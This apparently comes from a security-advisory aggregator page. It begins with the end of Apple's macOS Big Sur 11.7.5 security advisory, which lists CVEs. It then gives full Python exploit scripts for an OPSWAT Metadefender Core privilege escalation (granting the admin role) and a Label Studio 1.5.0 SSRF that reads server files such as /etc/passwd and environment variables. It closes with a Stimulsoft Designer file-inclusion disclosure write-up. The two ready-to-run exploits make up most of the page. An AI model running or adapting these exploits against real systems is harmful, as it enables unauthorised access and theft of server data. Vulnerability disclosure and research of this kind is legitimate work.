Available for: macOS Big Sur  
Impact: A user may gain access to protected parts of the file system  
Description: The issue was addressed with improved checks.  
CVE-2023-23527: Mickey Jin (@patch1t)

Archive Utility  
Available for: macOS Big Sur  
Impact: An archive may be able to bypass Gatekeeper  
Description: The issue was addressed with improved checks.  
CVE-2023-27951: Brandon Dalton of Red Canary and Csaba Fitzl  
(@theevilbit) of Offensive Security

Calendar  
Available for: macOS Big Sur  
Impact: Importing a maliciously crafted calendar invitation may  
exfiltrate user information  
Description: Multiple validation issues were addressed with improved  
input sanitization.  
CVE-2023-27961: Rıza Sabuncu (@rizasabuncu)

Carbon Core  
Available for: macOS Big Sur  
Impact: Processing a maliciously crafted image may result in  
disclosure of process memory  
Description: The issue was addressed with improved checks.  
CVE-2023-23534: Mickey Jin (@patch1t)

ColorSync  
Available for: macOS Big Sur  
Impact: An app may be able to read arbitrary files  
Description: The issue was addressed with improved checks.  
CVE-2023-27955: JeongOhKyea

CommCenter  
Available for: macOS Big Sur  
Impact: An app may be able to cause unexpected system termination or  
write kernel memory  
Description: An out-of-bounds write issue was addressed with improved  
input validation.  
CVE-2023-27936: Tingting Yin of Tsinghua University

dcerpc  
Available for: macOS Big Sur  
Impact: A remote user may be able to cause unexpected app termination  
or arbitrary code execution  
Description: The issue was addressed with improved bounds checks.  
CVE-2023-27935: Aleksandar Nikolic of Cisco Talos

dcerpc  
Available for: macOS Big Sur  
Impact: A remote user may be able to cause unexpected system  
termination or corrupt kernel memory  
Description: The issue was addressed with improved memory handling.  
CVE-2023-27953: Aleksandar Nikolic of Cisco Talos  
CVE-2023-27958: Aleksandar Nikolic of Cisco Talos

Find My  
Available for: macOS Big Sur  
Impact: An app may be able to read sensitive location information  
Description: A privacy issue was addressed with improved private data  
redaction for log entries.  
CVE-2023-23537: an anonymous researcher

Foundation  
Available for: macOS Big Sur  
Impact: Parsing a maliciously crafted plist may lead to an unexpected  
app termination or arbitrary code execution  
Description: An integer overflow was addressed with improved input  
validation.  
CVE-2023-27937: an anonymous researcher

Identity Services  
Available for: macOS Big Sur  
Impact: An app may be able to access information about a user’s  
contacts  
Description: A privacy issue was addressed with improved private data  
redaction for log entries.  
CVE-2023-27928: Csaba Fitzl (@theevilbit) of Offensive Security

ImageIO  
Available for: macOS Big Sur  
Impact: Processing a maliciously crafted file may lead to unexpected  
app termination or arbitrary code execution  
Description: An out-of-bounds read was addressed with improved bounds  
checking.  
CVE-2023-27946: Mickey Jin (@patch1t)

ImageIO  
Available for: macOS Big Sur  
Impact: Processing a maliciously crafted image may result in  
disclosure of process memory  
Description: The issue was addressed with improved memory handling.  
CVE-2023-23535: ryuzaki

Kernel  
Available for: macOS Big Sur  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: A use after free issue was addressed with improved  
memory management.  
CVE-2023-23514: Xinru Chi of Pangu Lab and Ned Williamson of Google  
Project Zero

Kernel  
Available for: macOS Big Sur  
Impact: An app may be able to disclose kernel memory  
Description: A validation issue was addressed with improved input  
sanitization.  
CVE-2023-28200: Arsenii Kostromin (0x3c3e)

NetworkExtension  
Available for: macOS Big Sur  
Impact: A user in a privileged network position may be able to spoof  
a VPN server that is configured with EAP-only authentication on a  
device  
Description: The issue was addressed with improved authentication.  
CVE-2023-28182: Zhuowei Zhang

PackageKit  
Available for: macOS Big Sur  
Impact: An app may be able to modify protected parts of the file  
system  
Description: A logic issue was addressed with improved checks.  
CVE-2023-27962: Mickey Jin (@patch1t)

System Settings  
Available for: macOS Big Sur  
Impact: An app may be able to access user-sensitive data  
Description: A privacy issue was addressed with improved private data  
redaction for log entries.  
CVE-2023-23542: an anonymous researcher

System Settings  
Available for: macOS Big Sur  
Impact: An app may be able to read sensitive location information  
Description: A permissions issue was addressed with improved  
validation.  
CVE-2023-28192: Guilherme Rambo of Best Buddy Apps (rambo.codes)

Vim  
Available for: macOS Big Sur  
Impact: Multiple issues in Vim  
Description: Multiple issues were addressed by updating to Vim  
version 9.0.1191.  
CVE-2023-0433  
CVE-2023-0512

XPC  
Available for: macOS Big Sur  
Impact: An app may be able to break out of its sandbox  
Description: This issue was addressed with a new entitlement.  
CVE-2023-27944: Mickey Jin (@patch1t)

Additional recognition

Activation Lock  
We would like to acknowledge Christian Mina for their assistance.

AppleMobileFileIntegrity  
We would like to acknowledge Wojciech Reguła (@_r3ggi) of SecuRing  
(wojciechregula.blog) for their assistance.

CoreServices  
We would like to acknowledge Mickey Jin (@patch1t) for their  
assistance.

NSOpenPanel  
We would like to acknowledge Alexandre Colucci (@timacfr) for their  
assistance.

Wi-Fi  
We would like to acknowledge an anonymous researcher for their  
assistance.

macOS Big Sur 11.7.5 may be obtained from the Mac App Store or  
Apple's Software Downloads web site:  
https://support.apple.com/downloads/  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmQiHnwACgkQ4RjMIDke  
Nxks0hAAquqDdtX6QvjVigRuSd2bpQny1TxVp62Zo47F9YkrvuvKVvJjaFzQJNjE  
p2Oq3BgNBkUqei26w8GLqwbg8szhCIPCOVHFcGDTPGrf53oWLlPc6WZxn8ihZOo4  
r3rxH4MGFSb+dBwWnF6GVX1EBcVjO08FwOzgNqkh2baqSU0iuxnSRW9XYmzwhG1w  
bj86kfnCooSLJlUTiTbXxN8W/vmfwRWONXQTkkOa47knWSKH9QBzzfAJKbil6sRE  
hDiYdtXUER//PApErvjl5i6b5wRQ0KQ19X//XfZzJtWCPuh0/nw7ducHJg+DpPUc  
EfNINhPKauqUvw516EvDuW0yVIlyMrfNCJOpHwQkmCfqx2i6l1+U5M8yqsyVcpbe  
Nbs6LYMNvDalLnazRRA3oT3036MrnCWem/M1afTrsoHYnhYb8FMx9gI3GV2Swgud  
fJrPttdjtpwlrCF60KsquJEvmcrNFwKk+QKS8Gbe8bbJSPk1AGsHN1JivFNiC036  
fycIK1ffwPHPYJgF6rLCOQ9q+DHRTw+lR0UrGmRplrjVBwt9cdiuLaeJZWPyGMwP  
P5QYlkULAE+5B4HKqzKMFYPkoEMzmvdOsgbhcg7OSmP1PAiAW6m7HnOmDAX7E2El  
03qFLcjb1GxM/U+lKN5Xx4rH+BR0yrEx20oZGX9Vymn7UJVYlDI=  
=xOHM  
-----END PGP SIGNATURE-----

Apple Security Advisory 2023-03-27-5

OPSWAT Metadefender Core version 4.21.1 suffers from a privilege escalation vulnerability.

    # Exploit Title: OPSWAT Metadefender Core - Privilege Escalation# Date: 24 October 2022# Exploit Author: Ulascan Yildirim# Vendor Homepage: https://www.opswat.com/# Version: Metadefender Core 4.21.1# Tested on: Windows / Linux# CVE : CVE-2022-32272# =============================================================================# This is a PoC for the Metadefender Core Privilege escalation vulnerability.# To use this PoC, you need a Username & Password.# The OMS_CSRF_TOKEN allows users to execute commands with higher privileges.# =============================================================================#!/usr/bin/env python3import requestsimport jsonfrom getpass import getpassurl = input("Enter URL in this Format (http://website.com): ")username = input("Username: ")password = getpass("Password: ")url_login = url+'/login'url_user = url+'/user'logindata = {"user":username,"password":password}## Get the OMS_CSRF_TOKEN & session cookieresponse_login = requests.post(url_login, json = logindata).json()json_str = json.dumps(response_login)resp = json.loads(json_str)token = resp['oms_csrf_token']session = resp['session_id']## Prepare Header & Cookieheaders = {    "oms_csrf_token": token,}cookie = {    "session_id_ometascan": session}## Set Payload to get Admin rolepayload = '{"roles": ["1"]}'response = requests.put(url_user,headers=headers,cookies=cookie,data=payload)print("Response status code: "+str(response.status_code))if response.status_code == 200:    print("Expolit Successful!")else:    print("Exploit Unsuccessful")

OPSWAT Metadefender Core 4.21.1 Privilege Escalation

Label Studio versions 1.5.0 and below suffer from a server-side request forgery vulnerability.

    # Exploit Title: Label Studio 1.5.0 - Authenticated Server Side Request Forgery (SSRF)# Google Dork: intitle:"Label Studio" intext:"Sign Up" intext:"Welcome to Label Studio Community Edition"# Date: 2022-10-03# Exploit Author: @DeveloperNinja, IncisiveSec@protonmail.com# Vendor Homepage: https://github.com/heartexlabs/label-studio, https://labelstud.io/# Software Link: https://github.com/heartexlabs/label-studio/releases# Version: <=1.5.0# CVE : CVE-2022-36551# Docker Container: heartexlabs/label-studio# Server Side Request Forgery (SSRF) in the Data Import module in Heartex - Label Studio Community Edition # versions 1.5.0 and earlier allows an authenticated user to access arbitrary files on the system. # Furthermore, self-registration is enabled by default in these versions of Label Studio enabling a remote # attacker to create a new account and then exploit the SSRF.## This exploit has been tested on Label Studio 1.5.0## Exploit Usage Examples (replace with your target details):# - python3 exploit.py --url http://localhost:8080/ --username "user@example.com" --password 12345678 --register --file /etc/passwd# - python3 exploit.py --url http://localhost:8080/ --username "user@example.com" --password 12345678 --register --file /proc/self/environ# - python3 exploit.py --url http://localhost:8080/ --username "user@example.com" --password 12345678 --register --file /label-studio/data/label_studio.sqlite3 --out label_studio.sqlite3.sqlite3import jsonimport argparseimport requestsimport shutil                    from urllib.parse import urljoinfrom urllib.parse import urlparserequests.packages.urllib3.disable_warnings() # main function for exploitdef main(url, filePath, writePath, username, password, shouldRegister):    # check if the URL is reachable    try:        r = requests.get(url, verify=False)        if r.status_code == 200:            print("[+] URL is reachable")        else:            print("[!] Error: URL is not reachable, check the URL and try again")            exit(1)    except requests.exceptions.RequestException as e:        print("[!] Error: URL is not reachable, check the URL and try again")        exit(1)    session = requests.Session()    login(session, url, username, password, shouldRegister)    print("[+] Logged in")    print("[+] Creating project...")    # Create a temp project    projectDetails = create_project(session, url)    print("[+] Project created, ID: {}".format(projectDetails["id"]))    #time for the actual exploit, import a "file" to the newly created project (IE: file:///etc/passwd, or file:///proc/self/environ)    print("[+] Attempting to fetch: {}".format(filePath))    fetch_file(session, url, projectDetails["id"], filePath, writePath)    print("[+] Deleting Project.. {}".format(projectDetails["id"]))    delete_project(session, url, projectDetails["id"])    print("[+] Project Deleted")    print("[*] Finished executing exploit")# login, logs the user indef login(session, url, username, password, shouldRegister):    # hit the main page first to get the CSRF token set    r = session.get(url, verify=False)    r = session.post(        urljoin(url, "/user/login"),        data={            "email": username,            "password": password,            "csrfmiddlewaretoken": session.cookies["csrftoken"],        },        verify=False    )    if r.status_code == 200 and r.text.find("The email and password you entered") < 0:        return    elif r.text.find("The email and password you entered") > 0 and shouldRegister:                        print("[!] Account does not exist, registering...")        r = session.post(            urljoin(url, "/user/signup/"),            data={                "email": username,                "password": password,                "csrfmiddlewaretoken": session.cookies["csrftoken"],                'allow_newsletters': False,            },        )        if r.status_code == 302:            # at this point the system automatically logs you in (assuming self-registration is enabled, which it is by default)            return    else:        print("[!] Error: Could not login, check the credentials and try again")        exit(1)# create_project creates a temporary project for exploiting the SSRFdef create_project(session, url):    r = session.post(        urljoin(url, "/api/projects"),        data={            "title": "TPS Report Finder",        },        verify=False    )    if r.status_code == 200 or r.status_code == 201:        return r.json()    else:        print("[!] Error: Could not create project, check your credentials / permissions")        exit(1)def fetch_file(session, url, projectId, filePath, writePath):    # if scheme is empty prepend file://    parsedFilePath = urlparse(filePath)    if parsedFilePath.scheme == "":        filePath = "file://" + filePath    headers = {        'Content-Type': 'application/x-www-form-urlencoded'    }    url = urljoin(url, "/api/projects/{}/import".format(projectId))    r = session.post(url,        data={            "url": filePath, # This is the main vulnerability, there is no restriction on the "schema" of the provided URL        },        headers=headers,         verify=False    )    if r.status_code == 201:        # file found! -- first grab the file path details        fileId = r.json()["file_upload_ids"][0]        r = session.get(urljoin(url, "/api/import/file-upload/{}".format(fileId)), headers=headers, verify=False)        r = session.get(urljoin(url, "/data/{}".format(r.json()["file"])), headers=headers, verify=False, stream=True)        print("[+] File found!")        # if user wants to write to disk, make it so        if writePath != None:            print("[+] Writing to {}".format(writePath))            # write the file to disk            with open(writePath, 'wb') as handle:                shutil.copyfileobj(r.raw, handle)                handle.close()            return        else:            print("==========================================================")            print(r.text)            print("==========================================================")            return    else:        print("[!] Error: Could not fetch file, it's likely the file path doesn't exist: ")        print("\t" + r.json()["validation_errors"]["non_field_errors"][0])        returndef delete_project(session, url, projectId):    url = urljoin(url, "/api/projects/{}".format(projectId))    r = session.delete(url, verify=False)    if r.status_code == 200 or r.status_code == 204:        return    else:        print( "[!] Error: Could not delete project, check your credentials / permissions")        exit(1)parser = argparse.ArgumentParser()parser.add_argument("--url", required=True, help="Label Studio URL")parser.add_argument("--file", required=True, help="Path to the file you want to fetch")parser.add_argument("--out", required=False, help="Path to write the file.  If omitted will be written to STDOUT")parser.add_argument("--username", required=False, help="Username for existing account (email)")parser.add_argument("--password", required=False, help="Password for existing account")parser.add_argument("--register", required=False, action=argparse.BooleanOptionalAction, help="Register user if it doesn't exist",)args = parser.parse_args()main(args.url, args.file, args.out, args.username, args.password, args.register)

Label Studio 1.5.0 Server-Side Request Forgery

Stimulsoft Designer (Web) 2023.1.3 is vulnerable to Local File Inclusion.

**Affected Product:** Stimulsoft Designer (Web)

**Affected Versions:** 2023.1.3 (confirmed) 2023.1.4 (allegedly)

**Fixed Version:** 2023.2.1

**CVE-Number:** CVE-2023-25260

**Severity:** 8.6 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N)

_Discovered by Ing. Simon Schönegger, BSC, MSc, Lejla Sarcevic, BSc, MSc, Dipl-Ing. Rainer Seyer, BSc_

During a penetration test for a customer, the penetration testers identified that this customer was using Stimulsoft Reporting Designer (Web) 2023.1.3 as a tool to design and view specifically crafted reports for their customers. During this penetration test the researchers discovered that this version is prone to local file inclusion.

The web version of the Reporting Designer offers the possibility to use a wide variety of local files as Datasource. When selecting a file, the Reporting Designer opens a file selection dialog. However, if the user does not open this dialog and simply inputs a path like C:\windows\temp\localfile.json the software will read this file from the filesystem of the server. Which files may be read depends on the privileges of the user which is used for starting the webserver. If a client runs the webserver as a high privileged user almost all files can be read. This vulnerability can be combined with remote code execution in order to present data without rendering it in the report.

No privileges are required to execute this exploit if the reporting viewer or designer are embedded in a page which lacks authentication. Since the authentication and authorization are measurements that the person who embeds the viewer and designer must implement, the privileges that are required to exploit this vulnerability are referenced as “None”.

**Proof of Concept**

For this Proof of Concept, the file C:\windows\temp\lfi.json is placed on the server. This file is included in a JSON datasource. When the included file is moved to a resource, the designer is able to see the content of the file  

Date

Action

2023/01/16

Discovery of the vulnerability

2023/01/20

Bulk disclosure of multiple vulnerabilities using the vendors support mail

2023/01/20

Vendor responds that this functionality was added by design

2023/01/21

Researchers respond that this vulnerability can read all XML and JSON like files including web.config and appsettings.json and advises to fix this vulnerability

2023/01/30

Vendor responds that they have added an additional configuration option to avoid loading local files which will be added in the march release

2023/01/30

Disclosure of the vulnerability to MITRE

2023/03/02

MITRE assigns CVE-2023-25260

2023/03/02

Researchers inform vendor about the CVE assignment and ask when the march version will be released

2023/03/02

Vendor responds that the version to fix this vulnerability will be released in the second part of march

2023/03/02

Agreement to publish the vulnerability as soon as the fix is released

Tag

#js